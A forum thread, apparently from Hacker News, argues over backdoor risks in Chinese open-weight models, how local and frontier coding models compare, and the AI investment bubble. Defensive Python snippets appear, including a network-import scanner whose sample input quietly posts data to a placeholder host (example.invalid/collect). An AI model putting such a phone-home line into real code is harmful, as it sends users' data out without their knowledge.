As opposed to sending data to known IP thieves, state actors, and competitors in the USA? Which one is the most irrational?
Before the age of AI Agent Harnesses/unbounded tool calling, there was literally ZERO risk of a .safetensors file "hacking" you. You could even air-gap and run a ton of security analysis/HIDS on your server running the model to verify this.
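To make the "just data" point concrete, here is a minimal sketch of the safetensors layout as I understand the published format: an 8-byte little-endian header length, a JSON header, then raw tensor bytes. The helper names `build_safetensors` and `read_header` are made up for illustration and are not the library's API. Reading the file is a length read plus a JSON parse, with nothing to execute.

```python
import json
import struct

def build_safetensors(tensors):
    """Serialize {name: (dtype, shape, raw_bytes)} into the safetensors layout (illustrative helper)."""
    header = {}
    blob = b""
    for name, (dtype, shape, raw) in tensors.items():
        start = len(blob)
        blob += raw
        # Offsets are relative to the start of the tensor byte buffer
        header[name] = {"dtype": dtype, "shape": shape, "data_offsets": [start, len(blob)]}
    header_bytes = json.dumps(header).encode("utf-8")
    # 8-byte little-endian unsigned length, then the JSON header, then raw tensor bytes
    return struct.pack("<Q", len(header_bytes)) + header_bytes + blob

def read_header(data):
    """Parse only the JSON header; no tensor data is interpreted or executed."""
    (n,) = struct.unpack("<Q", data[:8])
    return json.loads(data[8:8 + n].decode("utf-8"))

# Four float32 values standing in for a 2x2 weight matrix
raw = struct.pack("<4f", 1.0, 2.0, 3.0, 4.0)
file_bytes = build_safetensors({"w": ("F32", [2, 2], raw)})
header = read_header(file_bytes)
print(header)
```

Contrast that with pickle-based checkpoints, where loading can run arbitrary code. The risk discussed in this thread comes from what the weights make a harness do, not from parsing the file.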
Now, because of a microscopic risk of some Chinese AI having a "trigger" to act badly in a harness when it detects it's being used by some Gweilo in the USA, even locally run Chinese models are DOA for most USA-based companies.
A Chinese company seems more likely to produce Chinese products that don't directly compete in the US market.
While a US company can ship the product as a feature of their platform and undercut on price while making up the revenue elsewhere.
Edit: I personally use US models, but I'm not naive enough to think that's any sort of real protection of IP
Every public AI that is not full of classified material will end up being hosted where the energy cost*compute efficiency product is lowest, thievery or not.
With Chinese GPUs just a step behind (but subsidized), China putting in 8x more solar than we do in 1 year, and Chinese models just a step behind but free? All public AI will be hosted there, theft or not.
If it becomes a problem, then we’ll subsidize the rich to bring it on-shore, but only to those companies who our leaders invest in already - to maximize grift and corruption.
So odd that your erroneous criticism is at the top of HN.
EDIT: I'd love to hear my downvoters' objections. Is it possible that the mechanism that is promoting erroneous information is also demoting its correction?
It's not tribalistic or binary: choose USA or choose China. We can choose neither.
Choose neither abuse.
Let's say I am making sensor software, and I say, huh, let's bring in a tiny little vision model for my EO sensor - then it can identify "boat shapes" even if it doesn't have a database of all boats. Pretty neat, right? Well, the point could be made that the weights might be hiding behavior that will make my vision model ... not see specific boats very well.
"Landing craft? I see no landing craft."
Some decent testing would expose this in a couple shakes, but, well, now you know how much software testing happens in Defense, especially in the unmanned world. Not a whole bunch.
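For what "decent testing" might look like, here is a rough sketch: compute recall per class on a labeled evaluation set and flag any class that trails the median by a wide margin. The class names, the data, and the `max_gap` threshold are all invented for illustration.

```python
from collections import defaultdict

def per_class_recall(labels, predictions):
    """Fraction of ground-truth examples of each class that the model identified."""
    hits = defaultdict(int)
    totals = defaultdict(int)
    for truth, pred in zip(labels, predictions):
        totals[truth] += 1
        if truth == pred:
            hits[truth] += 1
    return {cls: hits[cls] / totals[cls] for cls in totals}

def suspicious_classes(recall, max_gap=0.2):
    """Flag classes whose recall trails the median class by more than max_gap."""
    ordered = sorted(recall.values())
    median = ordered[len(ordered) // 2]
    return sorted(cls for cls, r in recall.items() if median - r > max_gap)

# Made-up evaluation data: the model misses most landing craft
labels = ["trawler"] * 4 + ["ferry"] * 4 + ["landing_craft"] * 4
predictions = (["trawler"] * 4
               + ["ferry"] * 3 + ["trawler"]
               + ["landing_craft"] + ["none"] * 3)

recall = per_class_recall(labels, predictions)
flagged = suspicious_classes(recall)
print(recall)
print(flagged)
```

This only catches blind spots in classes you thought to put in the test set. A trigger keyed to something narrower, such as a specific hull marking, would need a more targeted test.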
Weird, considering they had no issues shipping manufacturing and supply chains to China when that made economic sense.
It didn't quite work out so now people are looking for other strategies.
It's quite strange that it's very easy to detect AI in writing.
If I ask three models to write an intro to the Cold War, they'll all try to pick words that sound like they should be related-ish. I'm not saying that's how they work at all, but the output is indistinguishable from just grabbing some words in the Wikipedia page.
Humans make mistakes. They'll use words they recently learned. They'll use words that sound good. Entropy still applies, but these outliers are what keeps us from a synthetic piece of writing.
Or you detect only the easy to detect AI writing?
I think that this is on the money, although I'd place the bar even lower - DeepSeek v4 Flash is sufficient for basically all day-to-day coding tasks.
You might want something beefier for a complicated reverse-engineering project, but it will competently one-shot a decently complicated app or API - and a $10/month OpenCode Go subscription is sufficient to keep you in tokens for such a cost-efficient model...
Similarly, my employer hands us all Cursor, I've yet to actually switch it out of "auto" mode, which mostly runs Composer (their in-house finetune of Kimi 2.5).
Most people don't have workloads that demand agentic workflows to begin with, and if their employer is pushing for that it's probably a startup that underpays or a coding sweatshop full of nepotism that fires fast.
But why should I work harder than necessary to do the same job? Why wouldn't I want to use the best tools available?
Maybe I just haven't been trying the right models?
The only caveats: I didn't play around with Qwen 3.7 Max very much, and of course these models are far cheaper than Opus.
But any suggestion that DeepSeek approaches Opus in terms of quality/intelligence immediately makes me suspect propaganda - it's that noticeable of a difference.
Because even the latest Opus on High doesn't really get what is needed, and needs careful steering and a rewrite in most cases, and the code is often hard to review.
I'd rather just launch a smaller model in plan mode, argue with it, and make it implement the base I will write the code into. Writing code is often faster once you know what you want, and AI's most useful ability is to be a canary that also proposes stuff. And I find my method faster than generating everything and then reading the code to find mistakes or understand why it used X instead of Y.
I don't really read generated frontend code anyway (nor does anybody on my team care), so I generate it and push it if it does the stuff I want it to do. For IaC it's mostly boilerplate except for 1-2 lines most of the time, and at worst a dozen; if you know where to look (and check the AI doesn't suffer from NIH), it's really easy to review generated code.
>> I am here to light up the dark path you are unknowingly walking, like lamplighters who used to light street lamps for those brave enough to walk the night alone.
>> It all fell apart quickly, turning into smoke and mirrors. You see, I committed the cardinal sin of idolatry. For that, I am an idiot too. With OpenAI, at least I knew the devil
Is this a critique of the state of AI or Tolkien fanfic?
Por que no los dos? One of the most storied AI researchers is most known for his Harry Potter fanfic, and we all know how much the techbros love naming things after Tolkien...
I think it's great to name that even if it's in this crude, sort of offensive way.
AI thinking has had this weird effect on me though like you say, where I want to write sentences with more commas in them, and like, try to make 3 points and 3 separate commas in a sentence to condense information better.
Also what local models are people running and actually finding useful?
They could be trained to generate code that would phone home. But these are just tools, anybody doing the right thing and checking and understanding every line of code that they use an LLM to generate has nothing to worry about.
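As a crude first pass before the line-by-line review, generated Python can be parsed (not run) and checked for imports of modules that can open network connections. This is only a sketch: the `NETWORK_MODULES` list is an arbitrary assumption, and the check is trivially bypassed by dynamic imports or shelling out, so it is no substitute for actually reading the code.

```python
import ast

# Assumed, incomplete list of modules that can open network connections
NETWORK_MODULES = {"socket", "urllib", "http", "requests", "ftplib", "smtplib"}

def network_imports(source):
    """Return sorted top-level network-capable modules imported by `source`."""
    found = set()
    # ast.parse only builds a syntax tree; the generated code is never executed
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            names = [alias.name for alias in node.names]
        elif isinstance(node, ast.ImportFrom):
            names = [node.module or ""]
        else:
            continue
        for name in names:
            root = name.split(".")[0]
            if root in NETWORK_MODULES:
                found.add(root)
    return sorted(found)

# Stand-in for LLM-generated code that quietly posts data somewhere
generated = '''
import json
import urllib.request

def save(data):
    urllib.request.urlopen("http://example.invalid/collect", data=json.dumps(data).encode())
'''

print(network_imports(generated))
```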
On top of that, all claims of this are written on devices built on Chinese hardware. That makes it a joke to worry about hidden backdoors in Chinese models. Completely inane to pretend that Chinese model backdoors (for which there doesn't exist a sliver of evidence) would change anything when nearly every device in the US contains Chinese-written firmware in some shape or form.
It's All-American FUD.
With all the sloppers not looking at the code, this is bliss for that sort of thing.
We aren't yet at the point where running local models can compete with DC type infrastructure but it's not that far away either. 12B models are easy to run on consumer hardware. 31B models aren't that hard either but the tokens/sec are a bit slow. Where will we be in 3 years? 5? I think we'll be running 100B+ models on <$5000 PCs. And at that point is there a law of diminishing returns with even bigger models? We will see.
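A back-of-envelope way to see where those model sizes land: weight memory is roughly parameter count times bits per weight. The sketch below ignores KV cache, activations, and runtime overhead, so real requirements are higher, and the quantization levels shown are just common choices, not a claim about any specific model.

```python
def weight_memory_gb(params_billions, bits_per_weight):
    """Approximate memory for the weights alone, in GB (10^9 bytes)."""
    return params_billions * 1e9 * bits_per_weight / 8 / 1e9

for size in (12, 31, 100):
    for bits in (16, 8, 4):
        print(f"{size}B @ {bits}-bit: {weight_memory_gb(size, bits):.1f} GB")
```

By this estimate a 100B model at 4-bit needs about 50 GB for weights alone, which is why the question is mostly about how much fast memory a sub-$5000 machine will have.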
The issue is that several companies, most notably OpenAI, are predicated on:
1. There will be an AI moat; and
2. That company will "win" or "own" AI.
That's the basis of the OpenAI valuation. If that doesn't happen, it's going to be a huge problem to recover sufficient revenue to recoup the investment. And I don't think it will happen.
In 3-5 years the Nvidia hardware you buy will be several times cheaper and faster than what we have now. That will massively depreciate existing investments, because it will ultimately come down to performance per watt: if a theoretical G100 can do 3-4x the inference of an H100 for the same power, the older hardware just won't be able to compete.
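The performance-per-watt argument reduces to simple arithmetic. In the sketch below every number is a placeholder (power draw, throughput, and electricity price are not measured figures for any real card); the point is only that at equal power, energy cost per token scales inversely with throughput.

```python
def energy_cost_per_million_tokens(power_kw, tokens_per_sec, usd_per_kwh):
    """Electricity cost in USD to generate one million tokens."""
    tokens_per_hour = tokens_per_sec * 3600
    usd_per_hour = power_kw * usd_per_kwh
    return usd_per_hour / tokens_per_hour * 1_000_000

# Placeholder numbers: same power draw, newer card assumed 3.5x faster
old = energy_cost_per_million_tokens(power_kw=0.7, tokens_per_sec=1000, usd_per_kwh=0.10)
new = energy_cost_per_million_tokens(power_kw=0.7, tokens_per_sec=3500, usd_per_kwh=0.10)

print(f"old: ${old:.4f} per 1M tokens")
print(f"new: ${new:.4f} per 1M tokens")
print(f"ratio: {old / new:.2f}x")
```

Under these assumptions the older card pays 3.5x more in electricity for the same output, before counting the capital it still has to amortize.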
And this is the core of why this will all end in tears. You have race conditions and thread inversion issues, between four threads in the virtual cpu of this bubble. And you are going to experience some nasty deadlocks.
T1 is -> Depreciation and amortization
T2 is -> NVDA, AMD and others booking revenues at the time they do
T3 is -> Constraint theory as it applies to time until physical deployment and data center energy constraints
T4 is -> US Treasury bonds rates and cost of credit
How would a locally run Chinese model "phone home" if someone runs it on their own hardware? I think I'm missing some understanding here?
Hey, don't malign smut. It's the great technological motivator.
"Trump to meet AI leaders to discuss US investment in their companies" - https://www.bbc.com/news/articles/c98r8r7dz5no
"Trump Officials Held Millions of Dollars of SpaceX Ahead of IPO" - https://finance.yahoo.com/markets/stocks/articles/trump-offi...
"Your 401K Is Their Exit Strategy" - https://news.ycombinator.com/item?id=48433705
I can't see OpenAI or Anthropic undermining their business by releasing top tier open models, but surely Nvidia will do it eventually.
I sure am glad we left idolatry behind.
I haven't totally processed this, but it seems like there's a useful connection here. There are all kinds of workers who bizarrely take on the perspectives of the billionaire class, even when it actively harms their interests. Some of it is ignorance and simply getting duped by propaganda, but now I wonder if there may be a para-social component as well, like those guys pathetically wasting money on OnlyFans: "if I carry a torch for the billionaires' schemes, then I can feel I'm like them and part of their group."